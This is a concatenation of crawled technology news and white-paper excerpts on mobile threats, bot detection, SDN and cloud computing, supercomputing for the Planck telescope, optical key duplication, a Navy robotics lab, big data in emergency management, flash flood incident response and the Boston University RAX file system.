to "phish" for passwords and financial information from mobile users and other Internet users. - Spamming: Spam is unsolicited commercial e-mail advertising for products, services, and websites. Spam can also be used as a delivery mechanism for malicious software. Spam can appear in text messages as well as electronic mail. Besides the inconvenience of deleting spam, users may face charges for unwanted text messages. Spam can also be used for phishing attempts. - Spoofing: Attackers may create fraudulent websites to mimic or "spoof" legitimate sites and in some cases may use the fraudulent sites to distribute malware to mobile devices. E-mail spoofing occurs when the sender address and other parts of an e-mail header are altered to appear as though the e-mail originated from a different source. Spoofing hides the origin of an e-mail message. Spoofed e-mails may contain malware. - Theft/loss: Because of their small size and use outside the office, mobile devices can be easier to misplace or steal than a laptop or notebook computer. If mobile devices are lost or stolen, it may be relatively easy to gain access to the information they store. - Zero-day exploit: A zero-day exploit takes advantage of security vulnerability before an update for the vulnerability is available. By writing an exploit for an unknown vulnerability, the attacker creates a potential threat because mobile devices generally will not have software patches to prevent the exploit from succeeding. Attacks against mobile devices generally occur through four different channels of activities: - Software downloads. Malicious applications may be disguised as a game, device patch, or utility, which is available for download by unsuspecting users and provides the means for unauthorized users to gain unauthorized use of mobile devices and access to private information or system resources on mobile devices. - Visiting a malicious website. Malicious websites may automatically download malware to a mobile device when a user visits. In some cases, the user must take action (such as clicking on a hyperlink) to download the application, while in other cases the application may download automatically. - Direct attack through the communication network. Rather than targeting the mobile device itself, some attacks try to intercept communications to and from the device in order to gain unauthorized use of mobile devices and access to sensitive information. - Physical attacks. Unauthorized individuals may gain possession of lost or stolen devices and have unauthorized use of mobile devices and access sensitive information stored on the device. Check out these other hot stories:
<urn:uuid:883f2fed-e5de-4d32-a84c-b0513ada04be>
CC-MAIN-2017-09
http://www.networkworld.com/article/2223158/malware-cybercrime/cybercrime-fest-targets-mobile-devices.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170613.8/warc/CC-MAIN-20170219104610-00238-ip-10-171-10-108.ec2.internal.warc.gz
en
0.925893
1,554
2.78125
3
University researchers have built a program that mimics the way people play the memory game Concentration, opening the possibility of improving computer security by distinguishing human behavior from bots. The study, conducted by North Carolina State University researchers, sets the groundwork for one day being able to integrate within software highly accurate bot-detection programs to prevent computer fraud.' Bots are software applications that run automated tasks over the Internet. While having legitimate purposes, such as fetching information from websites for search queries, bots are also used by scalpers to buy large quantities of tickets from ticketing sites and to infiltrate online in-game economies to amass virtual currency. The NCSU researchers set out to see whether they could simulate people's thought processes in playing Concentration, a solitaire game in which cards are arranged facedown on a grid and a person tries to find matching pairs. To do that, a person turns over a card and then chooses another. If they chooseright, the pair is taken off the grid. If not, then the cards are turned facedown and the player tries again, hoping to remember the location of cards in order to find them again later to make a match. "Concentration has been used in psychology literature as a model for memory for a few decades now," Robert St. Amant, co-author of the report, entitled "Modeling the Concentration Game wiith ACT-R," said on Monday. "But no one to our knowledge has built a cognitively plausible account of how people play the game." The researchers gathered information on the thought processes involved by monitoring the gameplay of 179 people playing an online version of Concentration that involved 16 cards. The game was played under two conditions, accuracy and speed. Under the latter, participants scored higher the faster they finished the game. Under the former, they got more points for choosing the right match. When striving for accuracy, the players were less random in their choices and had more time to think about the location of cards. The data fed into the program developed by researchers, called ACT-R, included the probability of the average player forgetting a card's location or remembering one seen before. Overall, ACT-R finished the speed game within a second of the average player and the accuracy game within one mistake. "We thought [the results] were pretty good," St. Amant said. "For us, we were able to distinguish between [people playing] the speed condition and the accuracy condition pretty easily." The research may eventually lead to determining whether a real person is participating in such activities as online voting because it shows that scientists can simulate human behavior in a program, albeit through a simple game. Further research will be needed to develop programs that can detect humans based on the way the keyboard and mouse are being used. This would replace the use of logs and IP addresses in watching for bots. While it would be possible for criminals to simulate keyboard and mouse use by a person, the expense of doing so would make such bots impractical, St. Amant said. Beyond just discovering bots, St. Amant said he believes future research on keystroke and mice dynamics could help scientists identify malice. How a person is using the devices "can actually tell something about the probability that you're trying to be a little bit deceptive," he said. The ability to analyze security-related intent based on how people use the devices that interact with their computers will likely be programmed into software within the next five years, Amant said. "Systems already exist to track people's mouse movements and keyboard actions in some kinds of games," Amant said. "This is just a matter of building the monitoring tools and raising flags to a human security person." Read more about malware/cybercrime in CSOonline's Malware/Cybercrime section. This story, "Researchers Mimic Board Game to Bolster Computer Security" was originally published by CSO.
<urn:uuid:1dc55fd1-b7cd-4e5c-a4d4-96694e61ef6f>
CC-MAIN-2017-09
http://www.cio.com/article/2384418/cybercrime/researchers-mimic-board-game-to-bolster-computer-security.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171775.73/warc/CC-MAIN-20170219104611-00290-ip-10-171-10-108.ec2.internal.warc.gz
en
0.967926
807
3.421875
3
SDN and Cloud Computing After a review of Software-Defined Networking (SDN) and its close cousin Network Functions Virtualization (NFV), this white paper addresses three main deployment scenarios: SDN without deploying cloud computing, cloud computing without deploying SDN, and deploying cloud computing in conjunction with SDN. We'll look at use cases, when the approach makes sense, and any applicable limitations. In this white paper, we'll review Software-Defined Networking (SDN) and briefly touch on its close cousin Network Functions Virtualization (NFV). After highlighting a few relevant cloud computing concepts and terms, we'll look at the three main deployment scenarios: SDN without deploying cloud computing, cloud computing without deploying SDN, and deploying cloud computing in conjunction with SDN. For each of these three scenarios, we'll look at use cases, when the approach makes sense, and any applicable limitations. Finally, we'll conclude with the reason SDN and cloud computing are often mentioned together and determine which approach is best for solving various business challenges. Brief Review of SDN and Cloud Computing Terms This white paper is not an in-depth review of SDN, NFV, or cloud computing, but rather explores the relationship between them. Therefore, we will not explain them in detail but instead offer a brief review of terminology and concepts to help you understand the entire white paper. SDN changes how networking is fundamentally done. Instead of having network intelligence distributed across every device, SDN aims to centralize command and control in a master device (or a few of them for redundancy) and to split networking into three planes, namely: - Management: This is the interface you use to orchestrate the entire network, specifying the way you wish the network to be run at a high level. - Control: This is where all the individual devices are directed from using the inputs from the management layer, translating management directives into the actual commands the data layer use to move traffic around. - Data: This is where the data is actually moved from one device to another. A major advantage of SDN is that the actual data layer devices can be much simpler and thus less expensive as they don't have to decide what to do with each packet they receive. From a human perspective, each device does not need to be individually programmed. SDN's purpose can thus be summarized as centralized command and control. NFV takes the physical networking devices commonly used today (switches, routers, load balancers, firewalls, antivirus, etc.) and virtualizes them in much the same manner as servers. NFV is used to scale out across devices less expensively (scaling by simply adding compute power) and to automatically deploy devices as needed. Thus each project does not require separate equipment or reprogramming of existing equipment. Relevant devices can be centrally deployed via your hypervisor management platform and configured with rules and policies. NFV is almost exclusively used in conjunction with virtualization of servers. NFV's goal can thus be summarized as automated provisioning of devices. SDN and NFV Together While SDN can be used without NFV and vice versa, the real power, especially as it relates to cloud computing, comes when they are used together. When combined you get automated provisioning along with centralized command and control. In the context of this white paper we will combine both under the SDN banner to simplify the discussion. Cloud computing is aimed at self-service provisioning across tenants. A tenant may be a project, department, division, or even a different company. As such, security becomes very important. There are multiple models associated with cloud computing; major categories include: - Infrastructure as a Service (IaaS): Making VMs available to customers with the physical hardware (servers, storage, and networking) managed by the service provider. A variation of IaaS allows physical servers to be used in place of VMs (called MaaS or Metal as a Service by some, though not officially part of the NIST definition of cloud computing). - Platform as a Service (PaaS): The development platform for programmers is provided as a service while all the details about the physical and virtual equipment is abstracted from the developer and managed by the service provider. - Software as a Service (SaaS): An application (such as email or contact management) is made available to customers while all the details of the underlying platform are abstracted from the customer. There are other models and services that can be deployed in conjunction with cloud computing, but are derivatives of those already listed. This white paper will mostly be addressing the first model (IaaS).
<urn:uuid:136ddfa5-314f-4d61-a407-0a0dc401ff48>
CC-MAIN-2017-09
https://www.globalknowledge.com/ca-en/resources/resource-library/white-paper/sdn-and-cloud-computing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171775.73/warc/CC-MAIN-20170219104611-00290-ip-10-171-10-108.ec2.internal.warc.gz
en
0.920374
961
2.53125
3
The European Space Agency’s massive Planck telescope has been hard at work digging through ancient light signals to find the original spark of the Big Bang. The clue-yielding light has traveled 13.8 billion years to reach research equipment and is so faint that Planck has to scan every point on the sky an average of 1,000 times to spot illuminations. This has resulted in an incredibly massive map of the cosmos, not to mention some interesting new spin-outs of the original research mission. As one might image this sky-mapping and light-combing process requires some serious HPC resources. “So far, Planck has made about a trillion observations of a billion points on the sky,” said Julian Borrill of the Lawrence Berkeley National Laboratory, Berkeley, Calif. “Understanding this sheer volume of data requires a state-of-the-art supercomputer.” But scientists behind the project point to another particularly difficult angle to their research that necessitates a high performance system. To get to the light sources and make accurate models, there is a lot of noise from the Planck sensors to plow through—and a lot of teasing apart of these critical signals versus the static that they are wrapped in. Project scientists point to the noise as one of the fundamental challenges of the mission and have looked to a top 20 system to solve the problem. At the heart of these signal search and filter process is the Opteron-powered “Hopper” Cray XE6 system that is part of the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Lab. According to NASA, the computations needed for Planck’s current data release required “more than 10 million processor-hours on the Hopper computer. Fortunately, the Planck analysis codes run on tens of thousands of processors in the supercomputer at once, so this only took a few weeks.” Hopper is NERSC’s first system at the petascale pedestal, which rounded out at number 19 on the last Top 500 list with 217 TB of memory running across 153,216 cores. The center is looking to continue the Cray tradition by tapping into the Cascade, as announced around ISC last year.
<urn:uuid:5e9758dc-e2ef-4289-87f6-96e98602d432>
CC-MAIN-2017-09
https://www.hpcwire.com/2013/03/25/hopper_lights_up_the_cosmos/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00466-ip-10-171-10-108.ec2.internal.warc.gz
en
0.926279
470
3.953125
4
What if a cloud computing infrastructure could recognize a cyberattack, eliminate it, and never stop working while all that is being done? That's what researchers at MIT, with help from the federal government, are investigating the feasibility of. Researchers at MIT's Computer Science and Artificial Intelligence Laboratory (CSAIL) have received funding from the Defense Advanced Research Projects Agency (DARPA) to bring about a cloud infrastructure that could identify cyberattacks and heal itself from any damages. DARPA has a number of ongoing research projects to develop more secure cloud environments. "The freedom, fluidity and dynamic platform that cloud computing provides also makes it particularly vulnerable to cyberattacks," according to the laboratory. As part of the "Cloud Intrusion Detection and Repair" study, MIT researchers hope to fundamentally map how cloud networks are created and operate. Based on that, a set of guidelines will be created for the cloud network to constantly assess itself to see if it is working within those guidelines and return to its normal operating procedure if it is not. The approach is different from other security measures that disable a system when a threat is detected, creating outages, the researchers said. "Much like the human body has a monitoring system that can detect when everything is running normally, our hypothesis is that a successful attack appears as an anomaly in the normal operating activity of the system," said principal investigator Martin Rinard. "By observing the execution of a 'normal' cloud system we're going to the heart of what we want to preserve about the system, which should hopefully keep the cloud safe from attack." The study's goal of continuing operations of the system even while under attack are a tenet of CSAIL's research. For example, other ongoing research includes studying vulnerabilities in Java applications and identifying and fixing malware in Android applications, all while the systems continue to operate. Network World staff writer Brandon Butler covers cloud computing and social media. He can be reached at BButler@nww.com and found on Twitter at @BButlerNWW. This story, "MIT takes aim at secure, self-healing cloud" was originally published by Network World.
<urn:uuid:adb8e434-ebc6-41f1-b076-81efcf352b0f>
CC-MAIN-2017-09
http://www.computerworld.com/article/2501740/cloud-computing/mit-takes-aim-at-secure--self-healing-cloud.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00586-ip-10-171-10-108.ec2.internal.warc.gz
en
0.951798
440
2.875
3
Researchers from the University of San Diego (Benjamin Laxton, Kai Wang and Stefan Savage) developed Sneakey, a system that correctly decoded keys from an image that was taken from the rooftop of a four floor building. In this case the image was taken from 195 feet. This demonstration shows that a motivated attacker can covertly steal a victim’s keys without fear of detection. The Sneakey system provides a compelling example of how digital computing techniques can breach the security of even physical analog systems in the real-world. The access control provided by a physical lock is based on the assumption that the information content of the corresponding key is private – that duplication should require either possession of the key or a priori knowledge of how it was cut. However, the ever-increasing capabilities and prevalence of digital imaging technologies present a fundamental challenge to this privacy assumption. Using modest imaging equipment and standard computer vision algorithms, we demonstrate the effectiveness of physical key teleduplication – extracting a key’s complete and precise bitting code at a distance via optical decoding and then cutting precise duplicates. In this paper, researchers describe their prototype system, Sneakey, and evaluate its effectiveness, in both laboratory and real-world settings, using the most popular residential key types in the U.S.
<urn:uuid:c700c435-fc7d-400e-841b-d3f241be1d69>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2008/10/31/reconsidering-physical-key-secrecy-teleduplication-via-optical-decoding/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00586-ip-10-171-10-108.ec2.internal.warc.gz
en
0.920115
264
2.703125
3
During a disaster, life-saving decisions are often made based on the most current information of a situation and past experiences in similar circumstances. While that’s a tried-and-true approach, the availability of complex, computer-generated data streams is changing the ball game for some emergency managers. Large volumes of data sets — commonly referred to as big data — derived from sophisticated sensors and social media feeds are increasingly being used by government agencies to improve citizen services through visualization and GIS mapping. In addition, big data is enabling responders to react to disasters more efficiently. Volunteers at Splunk, an operational intelligence software provider, are involved in a project that culls data from Twitter feeds. By analyzing keywords along with time and place information, a pattern of activity in a particular area can be unearthed. The idea was used during Superstorm Sandy. FEMA created an innovation team composed of public agencies and private companies. One of the participants was Geeks Without Bounds, a nonprofit humanitarian project accelerator, which partnered with Splunk’s charity arm, Splunk4Good, to apply the social media analysis. Team members working on the project looked at hashtags and words in Twitter feeds as well as Instagram photos related to Sandy, evacuation rates in specific areas and other keywords about resources, such as power, food, fuel and water. Using that data, the team plotted out locations where supplies might be most needed and got a finger on the pulse of a community’s sentiment about available resources. “You can imagine the ways it can be used in real time for response during an emergency,” said Stephanie Davidson, director of federal civilian sales for Splunk. “It’s really helpful for where to allocate those resources to the places that need them most.” Government agencies have been using social media data for sentiment analysis and public relations for a while. But according to Art Botterell — associate director of the Disaster Management Initiative at Carnegie Mellon University, Silicon Valley — practical use by emergency management agencies for response, recovery and preparation activities is fairly new. Botterell called current efforts of emergency managers using social media a period of rich experimentation, where decision-makers must determine whether big data derived from Twitter and Facebook should be further incorporated into practical emergency situations, or used simply as a communication tool. “This is an area that has been technology- and concept-driven, which is how most innovation happens, but now we’re getting to the point where it all falls under the big data tent [and] how do we know what is more useful and less useful,” Botterell said. “This is a conversation that I haven’t heard emergency managers having.” While computer-generated data has been a staple in decision-making processes for government and emergency personnel in the past, big data takes the volume and complexity to another level. As the data has expanded, so has the ability of companies and individuals to analyze it and apply the findings. Theresa Pardo, director of the Center for Technology in Government at the University at Albany, State University of New York, said the extent to which emergency management organizations can embrace big data relies on the culture within those agencies. If resources allow for analysts to spend time combing through data and putting out a presentation that is usable, high-volume data can be an asset. But Pardo admitted that’s an ideal situation that’s likely not present in most emergency management agencies nationwide. “That perfect model doesn’t really exist everywhere,” she said. “If we think about the adoption of big data, we also have to look at the maturity of … the data use environment generally within any emergency management community or agency.” Ted Okada, chief technology officer of FEMA, agreed and said that emergency agencies and the industry as a whole is still in the very early stages of using big data. As a community, he said, emergency managers need to learn how to extract the right bits of information at an early stage during a disaster. GIS was one of the first forays into complex data streams for FEMA. The agency works closely with a variety of organizations such as the National Oceanic and Atmospheric Administration and the U.S. Geological Survey to access their real-time data and create predictive models containing high-resolution maps and sensor data to help FEMA prepare for storms and other events. For example, during Sandy, FEMA accessed more than 150,000 geo-tagged photos from the Civil Air Patrol, which helped the agency perform assessments and make better decisions. “All that big data helped us very quickly come to a very definitive answer on how many people were affected,” said FEMA Geospatial Information Officer Chris Vaughan. “It helped us determine who was exposed and where there were structural damages so we could do a better job of providing assistance to disaster survivors faster than we have ever done before.” Social media is a different story. Ole Mengshoel, associate research professor of electrical and computer engineering for Carnegie Mellon University, Silicon Valley, said restrictions on the availability of public data on social media sites could slow progress in using it as a reliable tool in the big-data arena. Users who protect their tweets and make their Facebook postings private limit the amount of data available and therefore impact the data’s scope and dependability. From an academic point of view, Mengshoel said it “would be a pity” if big data’s potential based off social media data streams wasn’t reached because the companies were too protective of it. Although there are privacy and proprietary concerns with sharing some of that information, Mengshoel said that for emergency managers to truly harness the power of social media data, they’ll need the ability to sample or access it. GIS and sensor data may be easier to come by, but presenting that data in a useful form can be a daunting task. Vaughan said it is “insane” how many layers of information can be embedded on a Web-based map. The real challenge, said Vaughan, lies in putting the data in an easily understood format for emergency managers. “The faster we can provide imagery to the right person or group of people with the right assessments, it helps us streamline and make better decisions,” he said. Despite the challenges, Pardo feels the attention on big data will eventually benefit the industry. She believes that because there’s so much new data being generated, decision-makers will get more confident leveraging analytical information in policy development, program evaluation and delivery. Pardo called big data’s exposure in the last few years a mutually reinforcing process that draws attention to the need for a higher level of capability to use data more generally in the emergency management community, be it big or small. Event simulations is one area that Pardo felt big data could help improve. She said that as a major part of responders’ preparation activities, disaster simulations can at times suffer from a lack of statistical information to fuel predictive models. So where earthquakes, hurricanes or even shoreline erosion events are being trained for, large-volume data sets could help increase the accuracy and reliability of those models. “We’re in the phase right now where there’s a lot of very obvious and relatively straightforward ways to use these large-volume data sets,” Pardo said. “But we’re just beginning to develop new analytical tools and techniques to leverage that data.” Splunk4Good has made some inroads, Botterrell said, improving efficiency using big data could take some time. Actual emergency situations aren’t the best times to test the quality of data and do experiments because lives are usually at stake, he explained. Exposing people to large data sets doesn’t mean decision-making will be more accurate, Okada said. He said it could be a small fraction of a larger set of trends that can be overlooked that leads to a bad decision during a disaster. Instead of relying solely on data, Okada said a three-pronged approach can help protect decision-makers from the pitfalls of information overload. He referenced a principle from Robert Kirkpatrick, director of the Global Pulse initiative of the United Nations Secretary-General, a program that aims to harness the power of big data, as one way to prevent mistakes. Kirkpatrick advocates using the power of analytics combined with the human insight of experts and leveraging the wisdom of crowds. “That kind of data triangulation can help protect us going forward,” Okada said.
<urn:uuid:29e9cd0e-1689-46cd-927c-f6cf866dbeb8>
CC-MAIN-2017-09
http://www.govtech.com/fs/news/How-Emergency-Managers-Can-Benefit-from-Big-Data.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170914.10/warc/CC-MAIN-20170219104610-00110-ip-10-171-10-108.ec2.internal.warc.gz
en
0.942268
1,786
2.921875
3
Navy's 'Hunger Games' lab will put robots to survival tests - By Kevin McCaney - Mar 20, 2012 The Navy Research Lab has opened a multiclimate test lab that is being compared to a “Hunger Games” environment for robots and autonomous vehicles. The Laboratory for Autonomous Systems Research (LASR) will be used to test prototype autonomous systems in settings ranging from deserts and rain forests to waterborne and airborne environments. The lab’s test areas, or bays, includes one about half the size of a football field equipped with high-speed video cameras that can record up to 50 air vehicles, ground robots or human soldiers, according to InnovationNewsDaily, which compared the lab to a “Hunger Games” arena. Navy’s undersea robots get smarter UAV full-motion video changes the face of intelligence “The Hunger Games” is a 2008 young adult novel, soon to be released as a movie, in which large, naturalistic arenas are built for a reality TV show featuring a battle to the death by teenagers. The Navy may not be looking to stage death matches in LASR, but the robots, aircraft and amphibious vehicles will be severely tested. The rain forest bay, for example, can drop as much as 6 inches of rain per hour into an 80-degree environment with 80 percent humidity, InnovationNewsDaily reported. Or robots can try to navigate a desert climate with high winds, rock walls and a sand pit. LASR is continuing research into unmanned and autonomous systems that the Navy has been doing since 1923, NLR said in a statement. The new lab will help support the military’s growing use of unmanned aerial vehicles, ground robots and other autonomous systems. The lab, which was officially opened March 16 at NRL in Washington, D.C., features five specific test areas. - Prototyping High Bay, which is for small autonomous air and ground vehicles and the people who use them, has the world's largest real-time motion-capture volume, allowing scientists to get extremely accurate ground truth of the motion of vehicles and people, as well as allowing closed loop control of systems. - Littoral High Bay features a 45-foot by 25-foot by 5.5-foot deep pool with a wave generator capable of producing directional waves, and a slope that allows littoral environments to be recreated. - Desert High Bay contains a 40-foot by 14-foot area of sand 2.5-feet deep, with 18-foot-high rock walls that allow testing of robots and sensors in a desert-like environment. - Tropical High Bay is a 60-foot by 40-foot greenhouse that contains a re-creation of a southeast Asian rain forest, complete with all that rain, heat and humidity. - The Outdoor Test Range is a one-third acre highland forest with a waterfalls, stream and pond, and terrain of differing difficulty including large boulder structures and earthen berms. LASR also has electrical and machine shops where prototypes can be built. Among the tools available are 3-D prototyping machines that can make parts directly from computer-aided design drawings, a sensor lab with large environmental and altitude chambers, and a power and energy lab. Kevin McCaney is a former editor of Defense Systems and GCN.
<urn:uuid:467ea149-2e2f-4b18-b3f1-b7a2b6ed4fee>
CC-MAIN-2017-09
https://gcn.com/articles/2012/03/20/navy-lasr-hunger-games-lab-robots.aspx?admgarea=TC_EmergingTech
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171781.5/warc/CC-MAIN-20170219104611-00638-ip-10-171-10-108.ec2.internal.warc.gz
en
0.940683
703
2.9375
3
Flooding rains are not uncommon in Central Texas. The region has long been known as "Flash Flood Alley" due to its hilly terrain, shallow soils, and proximity to the moisture-laden Gulf of Mexico. When rain falls, it essentially has two options: soak into the soil, or flow downhill; the shallow and rocky soils of the Hill Country limit the former, so even a moderate rain causes runoff. The weekend of Memorial Day 2015, however, was something else entirely. Over a period of a few hours, between nine and 12.5 inches of rain fell over a wide range of the Hill Country - much of which fell within the watersheds of the Blanco and San Marcos rivers. A foot of rainfall - a third of a typical year's total - inundated the region in just a few hours, and had to go somewhere. [ ALSO ON CSO: Why disaster recovery planning can save lives ] The result was a catastrophic flash flood. The Blanco River rose 17 feet in a half hour, and 33 feet in a three-hour span, peaking far higher than had ever been recorded or even thought possible. Towering cypress trees that had survived six centuries of drought and flood were no match for this monstrous storm. In the lead photo to this story, massive cypress trees have been stripped of bark and branches 30 feet above the normally-placid river's surface. Ultimately, a 40-foot wall of water rushed downstream, scouring away everything in its path: trees, vehicles, homes, bridges, and unfortunately, people. Shortly afterward I wrote of the amazing resilience embedded in Texas culture. Texas has a long history of neighbors helping neighbors, and that culture showed itself after this disaster. From the many volunteers searching for the missing, to local businesses offering to replace vital necessities, to an impromptu clearinghouse to lend and borrow heavy equipment, watching the community set about the business of recovering has been an inspiration. Individual resilience is not enough in the face of a disaster of this magnitude though. Rebuilding hundreds of homes, roadway infrastructure, communications, and the other essentials of modern life requires a coordinated effort. Whether cyber or physical, some lessons apply in any disaster. Lesson 1: Preparedness In the midst of a crisis an organization falls back on its planning and preparedness. When an incident occurs, it is too late to put together a response plan. Flash floods are a known threat in Central Texas, and the region has several initiatives to address this threat. The City of Austin Flood Early Warning System reports the current state of over 1,000 "low water crossings" - often little more than a roadway with a culvert to allow a creek to pass beneath; during heavy rain, these crossings will frequently be temporarily impassable. The counties have spent years building awareness: 18 to 24 inches of moving water is enough to sweep most vehicles off the road. The saying "Turn Around, Don't Drown" is ingrained in the minds of residents. Ten counties in the greater Austin area participate in a Regional Notification System, whereby residents and interested parties can register their landlines and cell phones to receive notification of threats to life or property. Hays County has a long-standing volunteer Community Emergency Response Team trained to respond to wildfires, tornadoes, car wrecks, and flash floods. Hays County has set up haysinformed.com as a central location for authoritative information during an emergency. All of these steps required time to plan and to implement - and all were in place long before this crisis arose. Lesson 2: Damage control During an incident, damage control is the first rule. In a cyber event, you may be able to isolate the compromised environment to prevent further damage. You don't contain 10 billion gallons of rushing water though, so you do the next best thing: get out of the way. Amazingly, in a flash flood that destroyed 320 homes during the middle of the night, only 12 individuals were swept away. One was rescued the following morning and is alive today. Nine have been recovered deceased. Tragically, the two remaining unaccounted for are a 6-year-old boy, and the 4-year-old daughter of the rescued survivor. In this event, "damage control" took a multi-pronged approach. The National Weather Service had issued a flash flood watch early Saturday, but the situation did not become critical until around midnight Saturday night/Sunday morning. The NWS archive records the increasingly dire warnings as the reality of this event unfolded. This leads to lesson three...
<urn:uuid:4abdc7c2-37de-433d-aa1a-55602c6aa783>
CC-MAIN-2017-09
http://www.csoonline.com/article/2938999/emergency-preparedness/incident-response-lessons-from-a-flash-flood.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00458-ip-10-171-10-108.ec2.internal.warc.gz
en
0.958927
938
2.71875
3
Boston University (BU) developed its own timesharing system in the 1970s for its IBM 360 and 370 mainframes. The system was based on the batch-oriented Remote Access Computing System (RACS) developed by IBM. McGill University also participated in RAX development, but their version was renamed “McGill University System for Interactive Computing” (MUSIC). Although many of the details are lost in the mists of time, both systems used some text processing tools developed at BU. At the time, IBM had developed a few timesharing systems, but they were generally expensive and slow. IBM’s standard operating systems for the 360 series had a file system; files were referred to as data sets. To put matters as charitably as possible, IBM’s data set support was not suited to the dynamic nature of file access in timesharing environments. Frankly, it was a beast. So RAX really needed its own file system. In accordance with the traditions of IBM data processing, a RAX file looked more-or-less like a deck of punched cards. Files consisted of “records” that carried individual lines of text. Unlike punched cards, trailing blanks were omitted and the individual records (lines) could vary in length. More significantly, files were either read sequentially in a single pass, or written sequentially in a single pass. There wasn’t any notion of random access or of modifying the middle of a file without rewriting the whole thing. While RAX did support random access to hard drive files, the function was limited to specially allocated files (standard IBM data sets, actually) and used special operations that were only avaliable to assembly language programmers. Each file had a unique name and was ‘owned’ by the user that created it. Users could modify the permissions on files to share them with other users. The RAX system’s timesharing hours were generally limited to daytime and evenings. Overnight, the CPU was rebooted with IBM’s OS/360 or OS/VS1 to run batch jobs. Thus, the RAX hard drives had to be compatible with IBM’s native file system, such as it was. The RAX library was implemented inside a collection of IBM data sets, each data set serving as a pool of disk blocks to use in library files. These disk blocks were called space sets and contained 512 bytes each. A complete RAX library file name contained two parts: an 8-character index name and an 8-character file name. While this gave the illusion of there being a hierarchical file system, there was no true ‘root’ directory. All files not used by the RAX system programming staff resided in the “userlib” index; if no index name was given, RAX searched in userlib. The directory arrangement apparently worked as follows: There were a small number of IBM data sets that served as library directories (indexes). A file’s index name selected the appropriate data set to search for that file’s directory entry. These index files were apparently set up using IBM’s Indexed Sequential Access Method (ISAM). Such files were specially formatted to use a feature of the IBM disk hardware. Each data block in the file contained a key field along with space for a library file’s directory entry. The “key” part contained the file name. The IBM disk hardware could be told to scan the data set until it found the record whose key contained that name, and then it would retrieve the corresponding data. This put the burden of directory searching on the hard drive, and freed up the CPU to work on other tasks. The directory entry contained the usual timestamps (date created, accessed, modified, etc.), ownership information, access permissions, size, and a pointer to the first space set in the file. Once the system knew the location of the file’s first space set, it could retrieve the file’s contents sequentially. A space set address was a 32-bit number formatted in 2 fields: Remember that the library consisted of numerous data sets that served as pools of data blocks These pools were called lib files, and were numbered sequentially. The data blocks, or space sets, were numbered sequentially inside each lib file. Files within the RAX library were implemented as a list of linked space sets. The first four bytes of each space set carried the pointer to the next one in the file. The pointer bytes were managed automatically by the system’s read and write operations; they were invisible to user programs. The net result was that user programs perceived space sets as containing only 508 bytes, since 4 bytes were used for the link pointer. A single library file could contain space sets from many different lib files. Since each lib file tended to represent a contiguous set of disk space, file retrieval was most efficient when all space sets came from the same lib file. In practice, however, a file would incorporate space sets from whichever lib file had the most available. Free space was managed within individual lib files. Each lib file kept a linked list of free space sets. Space sets from deleted files were added back to the free list in the appropriate lib file. Here is a review of the eight issues listed above: - File data structure – variable length records that more or less corresponded to lines of text. - File block structure – uses a linked list to organize randomly located disk blocks into a sequential file - Directories – effectively a single level directory structure with user permissions and timestamps - Free space – manages in arbitrary, locally maintained lists. Any block can be in any file, eliminating fragmentation problems. - Easy to implement – built atop a rich IBM-oriented I/O mechanism – simple to implement in that environment, but hard to replicate in non-IBM environments. - Speed – Directory lookup is very fast. File data access is rarely optimized, though - Sequential vs. direct – system really only supports sequential access - Storage sizes – can combine data sets on multiple drives to store perhaps 2TB of data, assuming 512 byte space sets. Individual files are probably limited to 4GB by the size field in the directory entry. - Robustness – Links are brittle. System crashes could cause link inconsistencies, and the risk of a file’s link pointing to a space set on the free list. However, file replacement consists of not eliminating the old file and its chain of space sets until the new file’s chain has been completely built. System crashes during such updates would usually leave the previous file intact.
<urn:uuid:dc1226fd-7f39-407d-9992-9a1a84b39196>
CC-MAIN-2017-09
https://cryptosmith.com/2012/01/12/bu-rax/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00458-ip-10-171-10-108.ec2.internal.warc.gz
en
0.967079
1,375
3.375
3
Cloud computing promises to displace wholly owned information technology hardware and software. How does this assertion stand up over time? When the price of a durable item remains stable, the market for that item tends toward equilibrium between the item’s cost of ownership and its rental or lease rate. When the price is near that equilibrium, other factors influence the decision to buy or rent. For instance, a person may choose to buy, lease or rent a car. In New York City, a person may dispense with a car entirely, relying instead on taxis or mass transit. The “hassle factor”—the cost of parking and insurance—overwhelms the value of independent means of transportation. As another example, economists speak of the balance between the cost of home ownership and the price of renting an apartment. An apartment isn’t a home, but they provide similar enough functions to make a price comparison meaningful. For some people, moving from a home to an apartment or condominium makes sense. Renting reduces the hassle factor. These scenarios rely on stable prices over time. If the item’s price changes, the balance between ownership and renting shifts. When the price of a home steadily rises, the home becomes a good investment, despite the hassle factor of home ownership. Seeing the value of a new car drop in the first year of ownership, some people choose to lease. Others may buy, holding the car for much longer, and put up with the hassle factor of having an older car. Information technology faces similar economics. When the price of computing was very high, most users rented (using time-sharing). The lower price of computing over time led more businesses to buy, and those businesses could afford greater amounts of computational power. Increasingly powerful and affordable computing environments addressed larger sets of data and more complex algorithms. The range of problems itself didn’t change, but the cost of solving those problems dropped as the cost of technology steadily declined. Problems that had been impossible to solve became expensive to solve, and eventually became inexpensive to solve. For instance, American Airlines created a powerful competitive advantage by deploying the Sabre online reservation system in the ’60s. Now, any airline that doesn’t have an online reservation system isn’t a real airline. Companies across many industries applied computing following two mandates: Wherever there were 50 people doing the same thing, automate; and wherever there were 50 people waiting for one person to do something, automate. Companies with large computing infrastructures discovered their available spare capacity. A company with a million servers running at 98 percent utilization realized it had the equivalent of 20,000 machines idle. The executives knew capacity wasn’t waste, but simply the consequence of varying workload. They also realized they could “rent out” small chunks of their available computing resource, as long as they could fence those users from the internal processing the company needed to run. These companies 